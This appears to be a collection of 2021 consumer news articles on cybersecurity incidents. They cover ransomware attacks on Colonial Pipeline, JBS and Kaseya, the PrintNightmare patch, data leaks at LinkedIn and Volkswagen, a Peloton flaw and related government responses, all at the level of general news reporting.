Synnex put out a statement of its own on July 6 saying that it is “aware of a few instances where outside actors have attempted to gain access, through Synnex, to customer applications within the Microsoft cloud environment.” The company also said it’s continuing to review the attack in collaboration with Microsoft and a security firm. 

Cyberattack efforts ‘almost certainly’ ongoing

This isn’t the first time that members of Cozy Bear have been accused of working with Russian foreign intelligence to target U.S. government organizations. In 2016, the hacker group was accused of breaching the Democratic National Committee. It has also been accused of carrying out a cyberattack against SolarWinds -- a breach that affected nine government agencies. 

The latest breach comes on the heels of a series of ransomware attacks in the U.S. In the last year, Colonial Pipeline, insurance provider CNA, and IT software provider Kaseya have been targeted by these attacks. 

In a report published Thursday, intelligence agencies from the U.S. and U.K. said Russian military hackers have attempted to access the computer networks of "hundreds of government and private sector targets worldwide" between mid-2019 and early 2021. The agencies warned that those "efforts are almost certainly still ongoing."

Microsoft has issued a security patch for the so-called PrintNightmare flaw, which affects the Print Spooler feature that runs by default on Windows. 

The tech giant confirmed the vulnerability last week after security researchers at Sangfor accidentally sent out the proof-of-concept (PoC) exploit code. In doing so, the researchers effectively enabled bad actors to engage in remote execution code attacks to gain system-level privileges. 

Microsoft has now issued out-of-band security updates to fix the flaw, which has been given the number CVE-2021-34527 and been deemed “critical” in nature.

The company is issuing updates for Windows 10, Windows Server 2019, Windows Server 2012 R2, Windows Server 2008, Windows 8.1, and Windows RT. In yet another indication that Microsoft sees the flaw as a major problem, a patch is also being issued for Windows 7 -- an operating system that Microsoft stopped supporting last year.

“We recommend that you install these updates immediately,” says Microsoft. “The security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as ‘PrintNightmare’, documented in CVE-2021-34527.”

Security updates for Windows Server 2012, Windows Server 2016, and Windows 10 Version 1607 “will be released soon,” Microsoft said. 

While many consumers were celebrating the Fourth of July, a ring of international hackers were celebrating for an entirely different reason. Over the holiday weekend, the cybercrooks locked up more than a million individual computer devices and were demanding $70 million in bitcoin as a ransom.

The hackers have been identified as REvil, the Russian group known for hacking meat supplier JBS earlier this year. This time around, REvil compromised Kaseya Limited, a U.S. software company that develops IT management software. 

The hack affected many of Kaseya’s customers, including the Swedish grocery store chain Coop. It forced the company to close more than half of its 800 stores and rendered the retailer’s cash registers and self-service checkouts inoperable.

Hackers upping their game

Cybersecurity analysts worry that REvil has pushed the limits of hacking further than experts are equipped to handle. Some of Kaseya's customers are firms that oversee internet services for other companies, so REvil was able to snowball the number of victims rapidly. 

While many hack attacks try to tie up a single, standalone company, REvil was able to isolate each computer in Kaseya’s list of customers and ransom it separately. Reports say that REvil’s initial ransom request was for $45,000 to unlock each individual device.

On its face, Kaseya’s situation sounds dire. However, the company said things aren’t as bad as they seem.

“While impacting approximately 50 of Kaseya’s customers, this attack was never a threat nor had any impact to critical infrastructure,” said Fred Voccola, the company’s CEO. “Many of Kaseya’s customers are managed service providers, using Kaseya’s technology to manage IT infrastructure for local and small businesses with less than 30 employees, such as dentists’ offices, small accounting offices and local restaurants.”

Added up, Voccola said only 800 to 1,500 of Kaseya’s customers were compromised by the hack out of an estimated 800,000 to 1,000,000 local and small businesses it manages. Nonetheless, Voccola said his company’s global teams were working around the clock to get our customers back up and running. 

“We understand that every second they are shut down, it impacts their livelihood, which is why we’re working feverishly to get this resolved,” he said.

President Biden offers “full resources” to hacked victims

Shortly after REvil’s attack was set in motion, the U.S. government stepped in to help. Over the weekend, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) worked with Kaseya to offer some assistance to the victims of the hack. 

President Biden said he was offering the “full resources'' that he has at his disposal to assist in the response. As part of the effort, FBI and CISA officials created a detection tool for small businesses that uses Kaseya’s platform to analyze their computer systems and determine whether any indicators of a hack are present.

Remember that LinkedIn breach that put 700 million user records at risk? That number has now risen to a billion records that include the personal information of LinkedIn users.

The hacker, whoever they are, is having quite a field day. They have just updated their personal data trove with email addresses and passwords on top of other scraped personal information from LinkedIn users.

In reporting the new finding, PrivacySharks said it reached out to LinkedIn for verification. The firm received this official statement from Leonna Spilman, a corporate communications manager at LinkedIn:

“While we’re still investigating this issue, our initial analysis indicates that the dataset includes information scraped from LinkedIn as well as information obtained from other sources. This was not a LinkedIn data breach, and our investigation has determined that no private LinkedIn member data was exposed. Scraping data from LinkedIn is a violation of our Terms of Service, and we are constantly working to ensure our members’ privacy is protected.”

A review of what’s been hacked

PrivacySharks said its investigation turned up evidence that the files now contain the following 14 pieces of personal data:

• Names (first and last)

• Email addresses

• Street addresses

• Cities

• States

• Zip Codes

• Phone numbers

• Websites

• LinkedIn profiles

• Company names

• Job titles

• Fax numbers

• Email and password combinations

• LinkedIn connections

Given that the person behind the update is the same one linked to the original breach, most of the data is probably the same as what was exposed previously. 

What should LinkedIn members do?

Putting personal information on a site like LinkedIn was problematic for many users before details of this breach were publicized. One ConsumerAffairs reviewer named Lisa summed up her thoughts quite nicely.

“I personally do not like the idea of posting a resume for everyone to see when there are so many safety issues and Internet hackers out there,” she said.

If all that’s been reported is accurate, then LinkedIn users are up against a high wall when it comes to protecting their personal data -- and the platform has to be nervous about the potential fallout.

“From a consumer's point of view, I think the fact that this is the third LinkedIn data leak in a few months will be extremely unsettling for users,” Madeleine Hodson, Chief Editor at PrivacySharks told ConsumerAffairs. “Since passwords have been included in this recent leak (although not yet confirmed to be from LinkedIn accounts) it will cause concern and lead users to question the strength of LinkedIn's security measures.”

Researchers have found that the Peloton Bike+ had a flaw that rendered it vulnerable to being remotely hacked. The product isn’t yet commercially available, but researchers said the flaw would enable hackers to spy on riders -- and even their surroundings -- in public spaces such as a hotel or a gym. 

Software security company McAfee said the flaw in the stationary bike stemmed from the Android attachment that accompanies it. Researchers said attackers could access the bike through the port and install phony versions of popular apps like Netflix and Spotify. The fake apps could then be used to dupe users into entering their personal information. 

"The flaw was that Peloton actually failed to validate that the operating system loaded," said Steve Povolny, head of the threat research team. "And ultimately what that means then is they can install malicious software, they can create Trojan horses and give themselves back doors into the bike, and even access the webcam.

"Not only could you spy on riders but, maybe more importantly, their surroundings, sensitive information," Povolny said.

Peloton reportedly patched the issue on June 4, and researchers said there aren’t currently any indications that the flaw has been exploited. Prior to being fixed, the report said the flaw might have left users vulnerable to being watched.

“An unsuspecting gym-goer taking the Peloton Bike+ for a spin could be in danger of having their personal data compromised and their workout unknowingly watched,” the report stated.

Previous dangerous flaw

This isn’t the first time Peloton has confirmed a flaw. Last month, the company recalled all of its Tread+ and Tread treadmills over safety concerns after 70 consumers were injured and a child died after being sucked under the belt. Officials addressed the issue by updating the products’ software to require users to enter a code to restart the belt if it has been left unmoving for up to 45 seconds.

Peloton confirmed that the flaw researchers recently found on the Bike+ was also found on the recalled Peloton Tread. On its security and compliance page, the company warns that “no matter how much effort we put into system security, there can still be vulnerabilities present.”

Volkswagen has revealed that a vendor’s security oversight led to the exposure of data belonging to around 3.3 million customers and prospective buyers. The automaker said information was exposed after a supplier left the data unsecured online. 

In a customer letter, Volkwagen said most of the exposed data included names, addresses, emails, and phone numbers. In some instances, the data also included information about a vehicle purchased, leased, or inquired about, such as the Vehicle Identification Number (VIN), make, model, year, color, and trim packages.

Around 90,000 potential loan clients in the U.S. and Canada also had more sensitive data exposed, including driver's license numbers. Volkswagen said date of birth and social security numbers were exposed in a "small" number of cases. 

Data left unsecured for two years

The data exposed was collected between the years 2014-2019 and was left unprotected online between August 2019, and May 2021. The company didn't name the vendor responsible for the data exposure, nor did it say whether it knows if the data has been misused by scammers. Volkswagen said it has informed the appropriate authorities about the situation. 

“We take the safeguarding of your information very seriously,” the company said. “We have informed the appropriate authorities, including law enforcement and regulators. We are working with external cybersecurity experts to assess and respond to this situation and have taken steps to address the matter with the vendor.” 

VW said in the letter that it has partnered with IDX to provide customers with free credit protection services, including monitoring, insurance reimbursement, and identity theft recovery services if any issues arise. 

Electronic Arts (EA) -- the game developer responsible for video games like Star Wars Battlefront, The SIMS, Need for Speed, Madden NFL, and Apex Legends -- has been gamed itself. According to Motherboard, EA has become the victim of a cyberattack.

Not only did hackers swipe the source code for FIFA 21 and the Frostbite engine (which is the backbone for EA’s soccer/football series as well as Battlefield), but they are reportedly advertising that the data they stole is for sale on hacking forums. Motherboard reports that the hackers will only consider offers from well-known, marquee hackers.

An EA spokesperson confirmed that while hackers stole “a limited amount of game source code and related tools,” they did not gain access to player data. The company said it is confident that the hack won’t impact other games or its business as a whole. Nonetheless, it’s putting additional security in place. 

Source code is like gold in the video game industry

Luckily for EA, the hack isn’t one of the ugly ransomware kinds that targeted JBS and the Colonial Pipeline. The developer said it’s working with law enforcement to investigate the incident.

When companies like EA lose control over their source code, things can spiral out of control. “Source code is a big deal in programming, so it’s a big deal when companies lose control over it,” remarked The Verge’s Mitchell Clark.

Clark says EA’s not alone. Recently, the gaming industry has seen similar source code thefts for Cyberpunk 2077, The Witcher 3, and Super Mario Kart. Nintendo was also involved in a “gigaleak” that led to the loss of an unreleased Zelda game.

JBS, the world’s largest meat supplier, said Wednesday that it paid $11 million in ransom in response to the cyberattack that recently shut down its North American and Australian operations.

In a statement, the company said the ransom payment was made after most of its plants had come back online. 

"This was a very difficult decision to make for our company and for me personally," said Andre Nogueira, CEO of JBS USA, in a statement. "However, we felt this decision had to be made to prevent any potential risk for our customers."

Earlier this month, the cyberattack forced JBS to shut down some of its computer networks after an organized attack by an unidentified hacker group. The government has since attributed the ransomware attack to REvil, a criminal group believed to be based in Russia or Eastern Europe.

“As the lead federal investigative agency fighting cyber threats, combating cybercrime is one of the FBI’s highest priorities,” the FBI said in a statement. “We have attributed the JBS attack to REvil and Sodinokibi and are working diligently to bring the threat actors to justice. A cyberattack on one is an attack on us all.”

No data compromised

In Wednesday’s statement, JBS said no data was leaked as a result of the attack. 

"Preliminary investigation results confirm that no company, customer or employee data was compromised," JBS said.

The JBS cyberattack was the latest in a string of ransomware attacks on operating systems. In May, the operators of the Colonial Pipeline paid roughly $4.4 million to the gain of hackers that broke into its consumer systems. 

“This decision was not made lightly,” but it was one that had to be made, a company spokesman said last month. “Tens of millions of Americans rely on Colonial – hospitals, emergency medical services, law enforcement agencies, fire departments, airports, truck drivers and the traveling public.”

When a hacker group shut down the Colonial Pipeline with a ransomware attack last month, it caused a spike in East Coast gasoline prices and resulted in the company paying a ransom in Bitcoin to regain control of its network.

The U.S. Justice Department now reports that it was able to track down the digital wallet containing 63.7 bitcoins and seize the assets. At the time the ransom was paid, the bitcoins were worth $4.4 million.

Colonial said it paid the ransom because it wasn’t sure about the extent to which its network had been compromised. But at the same time, the company was working closely with the FBI and the Department of Justice’s new digital investigations unit to help track the payment to a Russian hacker group known as Darkside.

“Following the money remains one of the most basic, yet powerful tools we have,” said Deputy Attorney General Lisa Monaco. “Ransom payments are the fuel that propels the digital extortion engine, and today’s announcement demonstrates that the United States will use all available tools to make these attacks more costly and less profitable for criminal enterprises.”

Seizing digital assets

Previously, it was believed that payments made to criminals and scammers using Bitcoin were untraceable and not retrievable -- a major reason that the digital currency is favored by criminal enterprises.

U.S. investigators reviewed the Bitcoin public ledger and were able to track multiple transfers and identify that approximately 63.7 Bitcoins, representing the proceeds of Colonial’s ransom payment, had been transferred to a specific address. 

The FBI has the “private key,” or the rough equivalent of a password needed to access assets accessible from the specific Bitcoin address. Officials said the digital assets it discovered were involved in money laundering and could there be seized under criminal and civil forfeiture statutes. 

The company was a big help

Monaco said the fact that executives at Colonial Pipeline contacted the FBI immediately aided the search for the funds.

“Today’s announcements also demonstrate the value of early notification to law enforcement; we thank Colonial Pipeline for quickly notifying the FBI when they learned that they were targeted by DarkSide,” the attorney general said.

As news of the government’s seizure was announced, the value of Bitcoin plunged 8%. According to CNBC, the move may be related to the discovery that the digital currency may not be as anonymous and untraceable as people thought.

Cyberattacks have recently affected everything from meat producers to gasoline pipelines, and the potential impact of these online attacks is significant. Now, experts from the U.S. Department of Energy’s Pacific Northwest National Laboratory (PNNL) are developing new cybersecurity technology that’s designed to trick hackers and prevent serious cyberattacks. 

Experts designed a new tool called Shadow Figment, which creates a fake online world that mimics the way real online portals would respond to hackers. The system depends on software engineers who work behind the scenes to trick hackers into interacting with imaginary sites so that they can’t harm real targets. This gives time for experts to come in so they can face the threat.

“Our intention is to make interactions seem realistic, so that if someone is interacting with our decoy, we keep them involved, giving our defenders extra time to respond,” said researcher Thomas Edgar. 

Preventing cyberattacks

Electricity grids, pipelines, and water systems are all controlled by intricate online systems. A cyberattack on any one of these systems, which are often controlled by a multitude of devices, could put consumers’ health and safety at serious risk. 

With Shadow Figment, the system creates a distraction for the attacker that will interact much in the same way that the intended system is designed to respond. Using machine learning techniques, the software studies the actual system and then comes up with a harmless replica for hackers on-screen; this deceives criminals into thinking they’ve easily gotten into their desired point of attack. 

The technology is successful because it tricks the hackers into thinking their maneuvers are successful, which keeps them engaged in the “attack” for longer periods of time. The researchers gave the example of tampering with the temperature in a server room that needs to remain cool to function properly; Shadow Figment will indicate that the temperature in the room has gone up, which would prompt the hacker to continue on with their attack. 

The goal is to keep the hackers involved in the fake world so that software engineers can study their behaviors and work to prevent a serious attack. The more time the hacker spends in Shadow Figment, the more time that engineers have to work on the defense. 

“We’re buying time so the defenders can take action to stop bad things from happening,” said Edgar. “Even a few minutes is sometimes all you need to stop an attack. But Shadow Figment needs to be one piece of a broader program of cybersecurity defense. There is no one solution that is a magic bullet.” 

While there is still a patent pending for Shadow Figment, the technology is designed to benefit and protect everyone. 

“The development of Shadow Figment is yet another example of how scientists are focused on protecting the nation’s critical assets and infrastructure,” said researcher Kannan Krishnaswami. “This cybersecurity tool has far-reaching applications in government and private sectors -- from city municipalities, to utilities, to banking institutions, manufacturing, and even health providers.” 

The FBI says it knows who was behind the recent cyberattack that sidelined JBS, the world’s largest meat producer. The agency linked the deed to a notorious Russian ransomware gang and says it is working to stop the cyber bandits from doing any further harm.

“As the lead federal investigative agency fighting cyber threats, combating cybercrime is one of the FBI’s highest priorities,” the agency said in a statement. “We have attributed the JBS attack to REvil and Sodinokibi and are working diligently to bring the threat actors to justice. A cyberattack on one is an attack on us all.”

REvil/Sodinokibi sits atop all other ransomware groups, with a 12.5% share of the ransomware market -- and it’s been a busy bunch too. So far this year, it claimed that it stole unencrypted data from electronics company Acer, pilfered information from the celebrity law firm that represents Lady Gaga and Madonna, and made off with plans for upcoming Apple products.

Consumers are safe… for the moment

When a business is hacked, its customer database is usually part of the theft. Take, for example, the attack on Marriott hotels that exposed the personal details of 500 million hotel guests.

While consumers used to be easy targets for ransomware groups, one cybersecurity expert says cybercriminals tend not to go after the general population as much anymore because it’s just not that lucrative to do so.

“Consumers are more trouble than they are worth,” said Dick O'Brien, principal editor at Symantec, who authored a special report on targeted ransomware. "A lot of the consumers these days do not use computers that much, and ransomware is designed to infect Windows computers—they are not in the firing line, as much as enterprise users. Enterprises are—I would not say an easier target, but there are more possibilities for a compromise with them."

Ransomware still impacts consumers

ConsumerAffairs reached out to Purandar Das, co-founder at data security platform Sotero, to find out what trickle-down effect ransomware might have on consumers.

“The recent wave of escalating cyber and ransomware attacks on organizations will and is resulting in significant impact to the consumer. Most of what is being discussed and being written about is the operational impact to the organization. What is less understood and discussed is the impact to consumers and individuals,” Das told ConsumerAffairs.

“Whether it is the Solarwinds attack or the more recent attacks on the energy pipeline and now the meat processing industry, they will and are resulting in significant impact to the consumer.” How? Das says that even in the short term of those cyberattacks, consumers faced gas shortages and price increases. 

“These are indicative of the disruption that these attacks could cause. Also of concern is the possibility of data theft in any or all of these attacks. While it is not clear, at the moment, if any data has been stolen, stolen information would increase the possibility of consumers facing increasing identify related crimes as well as their personal information being held hostage,” he said.

JBS, the world’s largest meat processor, was the target of a cyberattack over the weekend that shut down its North American and Australian operations.

The company said it was forced to shut down some of its computer networks after an organized assault by an unidentified hacker group. Officials say the attack could result in some delays in its transactions with customers.

“The company took immediate action, suspending all affected systems, notifying authorities, and activating the company's global network of IT professionals and third-party experts to resolve the situation,” JBS said in a statement. “The company’s backup servers were not affected, and it is actively working with an Incident Response firm to restore its systems as soon as possible.”

The attack is the second on a major industry in less than a month. In May, a Russia-based hacker group shut down the Colonial pipeline carrying gasoline from the Gulf Coast to the Southeast and Mid-Atlantic states, resulting in fuel shortages and higher prices.

The latest attack could affect consumers at the supermarket. Because of JBS’s global scale, industry analysts say a shutdown that extends longer than a week could have an impact on the global supply chain. Plants in Canada and Australia ship meat around the world, Including to U.S. wholesalers.

Previous supply chain issues

The industry has only recently recovered from severe supply chain issues that arose during the coronavirus (COVID-19) pandemic. Outbreaks of the virus forced some U.S. meat processing plants to close temporarily. There was also a shortage of truck drivers to deliver the products to stores.

According to Bloomberg, the attack caused plants to cancel two shifts and stop processing operations at one of its Canadian plants. The report cites a union statement that operations have been affected at some U.S. facilities.

Two weeks ago, Microsoft issued a warning that cyber attacks were increasing and were becoming more dangerous. The company said the latest threat is malware that is delivered by email in the form of a PDF attachment.

The Biden administration has announced that it will require the nation’s leading pipeline companies to disclose any significant cyberattacks to the government. 

Companies aren’t currently required to report cyberattacks, meaning experts don’t have a clear picture of how vulnerable the industry is to hackers. Earlier this month, the repercussions of a cyberattack on a pipeline were on full display after the Colonial Pipeline was hit by one. The incident led to panic and fuel shortages across nearly half of the East Coast. 

Alejandros N. Mayorkas, the secretary of homeland security, said Thursday morning that the Colonial Pipeline case showed “that the cybersecurity of pipeline systems is critical to our homeland security.” 

"Ransomware, which is primarily criminal and profit-driven, can rise to the level of posing a national security risk and disrupt national critical functions," he said. 

New security directive

In addition to requiring major pipeline companies to report cyberattacks, the Biden administration’s new directive calls for the creation of 24-hour emergency centers focused on heading off these threats if they do occur. 

A cybersecurity coordinator will be designated to coordinate with both the Transportation Security Administration (TSA) -- which was tasked with controlling pipeline security post-September 11, 2001 -- and the Cybersecurity and Infrastructure Security Agency (CISA) in the event of a cyber attack. The New York Times noted that it’s unclear “what that employee would be empowered to do other than raise an alarm.” 

The order also requires pipeline companies to “identify any gaps and related remediation measures to address cyber-related risks” and report them to the TSA and CISA within the next 30 days. 

Homeland Security officials added that they will “continue to work closely with our private-sector partners to support their operations and increase the resilience of our nation’s critical infrastructure.”

Microsoft is alerting users about a huge malware campaign that can steal data and stage fake ransomware attacks.

The malware tries to lure recipients into opening what appear to be PDF attachments in email blasts. But when victims click on those attachments, they wind up downloading a malware variant called StrRAT.

Microsoft’s Security Intelligence Team tweeted that StrRAT’s job is to confuse a computer’s operating system and gain access to browser passwords, log keystrokes, and run remote commands. 

Running remote commands can be quite the plaything for a hacker. It allows them to run willy-nilly through a user’s computer, harvesting sensitive information that can range from email credentials to data stored in internet browsers.

The attack sequence to watch out for

In following the malware’s trails, Threatpost was able to determine what the malware’s attack sequence is. It plays out like this:

To start, attackers have been known to use compromised email accounts to send several different emails. To date, the messages disguise the sender as someone who is a supplier or has something to do with the payment of goods or services. Some of the messages use the subject line “Outgoing Payments.” Others refer to specific payments supposedly made by the “Accounts Payable Department.” Still others say “your payment has been released as per attached payment advice” and asks the recipient to verify adjustments made in the attached PDF.

That PDF -- if clicked -- is where the trouble starts. The malware is downloaded to the user’s computer and the hackers are off to the races gathering all the data they can mine. While extortion is not the primary idea behind the attack, reports are circulating that the hackers may also try to make a quick buck off users by disguising their attack as a form of ransomware.

Guarding against the attack

Microsoft says its Microsoft 365 Defender delivers “coordinated defense against this threat” and can protect users against malicious emails after they’re detected.

The company’s Security Intelligence Team has also published what it knows on GitHub so others who deal with computer security can identify indicators of malicious behaviors related to StrRAT before they do any damage.

Microsoft has announced that it will officially end support for its Internet Explorer browser next June. The company is encouraging users to switch to its newer browser, Microsoft Edge. 

In a blog post on Wednesday, Microsoft highlighted the myriad benefits of transitioning to Microsoft Edge. Those benefits include enhanced security, speed, and compatibility with a greater range of websites. 

"The future of Internet Explorer on Windows 10 is in Microsoft Edge," the company said. "Not only is Microsoft Edge a faster, more secure and more modern browsing experience than Internet Explorer, but it is also able to address a key concern: compatibility for older, legacy websites and applications."

The tech giant noted that Microsoft Edge has Internet Explorer mode (“IE mode”) built in, so users will still be able to access Explorer-based websites and apps from the newer browser. That said, Microsoft said it’s officially pulling the browser out of service next summer. 

“With Microsoft Edge capable of assuming this responsibility and more, the Internet Explorer 11 desktop application will be retired and go out of support on June 15, 2022, for certain versions of Windows 10,” the company wrote. 

Upgrading is easy

Microsoft has been moving closer to making this announcement for some time. Last year, Microsoft said its Microsoft 365 apps suite would no longer support Internet Explorer 11 as of August 17, 2021. The company touted the various benefits of switching to Edge and said users would “get the most out of Microsoft 365” by switching to its newer browser. 

The company said it’s committed to helping make the transition to Edge “as smooth as possible.” In its Wednesday blog post, Microsoft said users will find that it’s easy to move all of their passwords and data over to the new browser.  

“We’ve also aimed to make the upgrade to Microsoft Edge simple. Once you’ve opted in to moving to Microsoft Edge, it’s easy to bring over your passwords, favorites and other browsing data from Internet Explorer in a few clicks,” the company said. “And if you run into a site that needs Internet Explorer to open, Microsoft Edge has Internet Explorer mode built-in so you can still access it.”

Researchers from cybersecurity security firm Check Point Research have found that a number of Android apps had “misconfigurations” on cloud services, leaving user data belonging to more than 100 million users vulnerable to a variety of attacks. 

In a report published Thursday, Check Point said it recently discovered that the developers behind nearly two dozen mobile apps didn’t configure their real-time database properly. 

“Real-time database allows application developers to store data on the cloud, making sure it is synched in real-time to every connected client,” Check Point explained. 

In the last few months, the team said many application developers have “put their data and users’ data at risk” by failing to ensure that authentication mechanisms were in place.

“By not following best practices when configuring and integrating 3rd party cloud services into applications, millions of users’ private data was exposed,” the team wrote. “In some cases, this type of misuse only affects the users, however, the developers were also left vulnerable. The misconfiguration put users’ personal data and developer’s internal resources, such as access to update mechanisms and storage at risk.” 

23 apps examined

The researchers said the 23 Android apps they examined -- which included a taxi app with over 50,000 installs, a logo maker, a screen recorder with over 10 million downloads, a fax service, and astrology software, among others -- contained a variety of security shortcomings. 

Check Point said the apps were leaking data that included email records, chat messages, location information, user IDs, passwords, and images. Thirteen of the apps left sensitive data publicly available in unsecured cloud setups. 

In the case of the Angolan taxi app “T’Leva,” the researchers found that they were able to obtain user data, including messages exchanged with drivers, riders’ full names, phone numbers, and destination and pickup locations.  

‘Disturbing reality’

Aviran Hazum, Check Point's manager of mobile research, said the study "sheds light on a disturbing reality where application developers place not only their data, but their private users' data at risk."

When app developers fail to follow the “best practices” when configuring and integrating third party cloud services, the researchers said it could potentially leave users vulnerable to several types of cybersecurity threats. 

"This misconfiguration of real-time databases is not new, but [..] the scope of the issue is still far too broad and affects millions of users," the researchers said. "If a malicious actor gains access to this data it could potentially result in service-swipe (trying to use the same username-password combination on other services), fraud, and identity theft."

The firm said it informed the app developers of the vulnerabilities, and a few have since changed their configuration.

DarkSide, the hacker group behind the temporary shutdown of the Colonial Pipeline, received just over $90 million in bitcoin ransom payments from victims, according to new research. 

Earlier this month, the Colonial Pipeline -- a 5,500-mile pipeline that supplies fuel to the East Coast of the U.S. -- was hit by a cyberattack, causing a system outage. The attack led to a shortage in fuel supplies, which led to crowds at gas stations and higher gas prices.

In a blog post, London-based blockchain analytics firm Elliptic said it identified the Bitcoin wallet used by the cybercriminals to collect ransom payments from victims. 

“In total, just over $90 million in Bitcoin ransom payments were made to DarkSide, originating from 47 distinct wallets,” Elliptic said. “According to DarkTracer, 99 organisations have been infected with the DarkSide malware - suggesting that approximately 47% of victims paid a ransom, and that the average payment was $1.9 million.” 

Colonial reportedly paid the Eastern European criminal gang $5 million. 

‘Ransomware as a service’ business model

Last Monday, DarkSide issued a statement saying it didn’t intend to cause a disruption in the movement of fuel supplies. It operates a “ransomware as a service” business, meaning it developed the software used by the criminals that carried out the attack.

“We are apolitical, we do not participate in geopolitics,” the group said in the statement.

Nonetheless, security researchers said DarkSide and its affiliates netted at least $90 million in bitcoin ransom payments over the past nine months. The funds were extracted from 47 victims. 

Elliptic said the average payment from organizations was around $1.9 million. Of the $90 million total figure, $15.5 million went to DarkSide’s developer and $74.7 million went to its affiliates. A majority of the funds are being sent to crypto exchanges where they can be swapped for other cryptocurrency assets or fiat money. 

“To our knowledge, this analysis includes all payments made to DarkSide, however further transactions may yet be uncovered, and the figures here should be considered a lower bound,” said Tom Robinson Elliptic’s co-founder and chief scientist.

President Biden has signed a new executive order that he hopes will improve cybersecurity for Americans and protect federal government networks from attacks like the recent Colonial Pipeline incident. 

Biden said malicious cyber activities -- like network hacks, phishing, and data thefts -- have gone too far and that the U.S. cyber defense systems are insufficient, making both the public and private sectors more vulnerable to incidents. 

“These incidents share a few things in common. First, a laissez-faire attitude towards cybersecurity,” commented a senior White House official in announcing the order. “For too long, we failed to take the necessary steps to modernize our cybersecurity defenses because doing so takes time, effort, and money. And instead, we’ve accepted that we’ll move from one incident response to the next. And we simply cannot let ‘waiting for the next incident to happen’ to be the status quo under which we operate.”

Starting at the top 

The Colonial Pipeline incident wasn’t pegged as the breaking point that created the new order. It -- along with the SolarWinds and Microsoft Exchange incidents -- proved that U.S. cybersecurity was in a world of hurt. To prevent skirmishes like that in the future, the White House’s goals will start at the top of the digital food chain with the intent of creating a “zero-trust environment.” 

Internet service providers, network security systems, and other top-level segments are being asked to deploy measures like multi-factor authentication, encryption, endpoint detection response, and logging to keep bad actors at bay. They’re also being asked to share their attacks with their peers so an all-for-one, one-for-all community can be nurtured. The second layer of the Biden administration’s plan deals with improving the security of commercial software by establishing baseline security requirements based on industry best practices. 

“We wouldn’t build a building in an earthquake-prone zone without building standards,” the White House official said. “And we need standards for how we build software securely.”

Tighter controls on software development

To that end, the U.S. is kickstarting a pilot program to create an “energy star” type of label so the government – and the public at large – can quickly determine whether software was developed securely. 

“Too much of our software, including critical software, is shipped with significant vulnerabilities that our adversaries exploit. This is a long-standing, well-known problem, but for too long we have kicked the can down the road,” the White House said in a statement.

However, the official warned that this move alone isn’t the answer. “This will be the first of many ambitious steps the public and private sector must and will take together to safeguard our economy, security, and the services on which the American way of life relies,” they said.

Gas prices could move higher, at least temporarily, after a major pipeline supplying fuel to the East Coast of the U.S. was closed over the weekend due to a cyberattack.

The Colonial Pipeline, which stretches from the Gulf Coast to New Jersey and moves millions of gallons of fuel, had to be shut down when hackers launched a ransomware attack against the company that operates it. 

The company said it has not yet been able to uncover any evidence that the attackers were able to penetrate the pipeline’s vital systems. The company shut down the pipeline out of an abundance of caution.

“In response, we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations and affected some of our IT systems,” Colonial said in a statement. 

FBI investigating

The company said it acted immediately to engage a cybersecurity firm to investigate. At the same time, it notified the FBI. A spokesman for the agency told the Wall Street Journal that the agency is working closely with Colonial to make sure its systems remain secure from attack.

“Colonial Pipeline is taking steps to understand and resolve this issue,” the company said. “At this time, our primary focus is the safe and efficient restoration of our service and our efforts to return to normal operation. This process is already underway, and we are working diligently to address this matter and to minimize disruption to our customers and those who rely on Colonial Pipeline.”

But closing the 5,500 mile-long pipeline has cut off a major artery of fuel across the Southeast and up the Atlantic Coast. Depending on how long the shutdown continues, fuel supplies could begin running low and prices could begin to rise. 

Advice for consumers

Patrick DeHaan, head of petroleum analysis at GasBuddy, advised motorists served by the pipeline on Sunday not to panic.

“Rushing out and filling your tank will make the problem much much more acute and likely double or triple the length of any supply event if it comes to that,” he tweeted.

The Colonial Pipeline moves 100 million gallons of gasoline, diesel fuel, and other products each day, so a lengthy shutdown would be noticeable at the gas pump in a highly populated area of the country. The company noted that it moves nearly half the region’s fuel on a daily basis.

In 2017, Hurricane Harvey forced a shutdown of the Colonial Pipeline, resulting in a temporary price surge at the gas pump. Months earlier, Colonial suffered a break in its Line 1 in Georgia, interrupting fuel supplies to the East Coast. It resulted not only in rising prices but caused lines at gas stations in Tennessee when some stations' tanks ran dry. It took several weeks for prices to return to normal.

Security researchers have discovered that Dell has been pushing a firmware update for the last 12 years that contains “five high severity flaws.” Experts at SentinelLABS say those flaws impact hundreds of millions of Dell desktops, laptops, notebooks, and tablets.

Although the vulnerabilities could allow hackers to exploit Dell computers and do further damage, SentinelLABS says it has not discovered evidence of any “in-the-wild abuse.” 

As for owners of non-Dell computers, there’s good news: this specific vulnerability affects only Dell-specific systems.

Dell steps up to fix the issue

Even though SentinelLABS hasn’t uncovered any widespread abuse, Dell isn’t taking any chances. Just to make sure nothing goes wrong, the company has sent a security update to its customers to address the exposure. It recommends that every Dell computer owner apply the patch as soon as possible.

Dell warns owners that a hacker could use phishing techniques to gain access to their computer if it is left unpatched. “To help protect yourself from malicious actors, never agree to give remote control to your computer to any unsolicited contact (such as from an email or phone call) to fix an issue,” the company advises.

SentinelLabs also says customers should not waste time installing the patch. “It is inevitable that attackers will seek out those that do not take the appropriate action. Our reason for publishing this research is to not only help our customers but also the community to understand the risk and to take action,” said SentinelLABS’ Kasif Dekel.

Verizon is bidding farewell to its media group, home to digital brands AOL and Yahoo. The company is selling the unit to a private equity firm.

In a $5 billion deal, Apollo Global Management will be the new parent company of Verizon Media -- a deal that comes preloaded with 900 million monthly active users worldwide. Among the more well-known consumer-side companies Apollo has an investment in are the home security service ADT, movie rental company Redbox, photo service company Shutterfly, and online education provider University of Phoenix.

Verizon Media has been a heavy burden for the company, taking four years for it to show year-over-year growth since the wireless titan acquired Yahoo for $4.48 billion. The company is not getting out of the digital media business altogether, rather just shifting gears with an emphasis on its internet-provider businesses. As part of the deal, Verizon is holding on to a 10% ownership stake just in case there’s a seismic shift back to digital media down the line.

Value in Yahoo’s name

Yahoo -- the once golden child of internet search -- has been left to pick up breadcrumbs left by Google for the last decade. However, out of the three major search engines -- Google, Bing, and Yahoo -- only Google and Yahoo were turning a profit as of mid-2020. 

